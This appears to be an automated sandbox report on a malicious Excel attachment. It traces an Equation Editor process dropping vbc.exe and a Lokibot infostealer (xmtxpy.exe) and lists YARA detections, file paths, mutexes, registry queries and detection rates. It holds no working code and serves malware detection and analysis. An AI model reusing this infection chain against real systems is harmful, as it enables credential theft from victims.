              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_00403225
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0040604C4_2_0040604C
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004047724_2_00404772
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AEFA95_2_008AEFA9
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B50C25_2_008B50C2
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B68A15_2_008B68A1
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B56345_2_008B5634
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B786D5_2_008B786D
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B39AC5_2_008B39AC
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B4B505_2_008B4B50
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_001209FB5_2_001209FB
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_0040549C6_2_0040549C
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_004029D46_2_004029D4
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B50C26_2_008B50C2
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B68A16_2_008B68A1
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B56346_2_008B5634
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B786D6_2_008B786D
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B39AC6_2_008B39AC
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AEFA96_2_008AEFA9
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B4B506_2_008B4B50
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: String function: 008AFF50 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: String function: 00405B6F appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\xmtxpy.exe DE398BE02D5ABE9C8BCE84380AC5303EA00FC00820A50CAD007220F24538B3DE
              Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory allocated: 76F90000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory allocated: 76E90000 page execute and read and write
              Source: _2201S_BUSAN_HOCHIMINH_.xlsxVirustotal: Detection: 35%
              Source: _2201S_BUSAN_HOCHIMINH_.xlsxReversingLabs: Detection: 32%
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,6_2_0040650A
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$_2201S_BUSAN_HOCHIMINH_.xlsx
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD613.tmp
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@8/27@81/3
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,4_2_00402012
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_00404275
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: wntdll.pdb source: xmtxpy.exe, 00000005.00000003.463241268.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, xmtxpy.exe, 00000005.00000003.461526742.00000000023E0000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2556, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AFF95 push ecx; ret 5_2_008AFFA8
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00402AC0 push eax; ret 6_2_00402AD4
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00402AC0 push eax; ret 6_2_00402AFC
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AFF95 push ecx; ret 6_2_008AFFA8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_00405DA3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)

              Boot Survival

              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AEFA9 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_008AEFA9
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
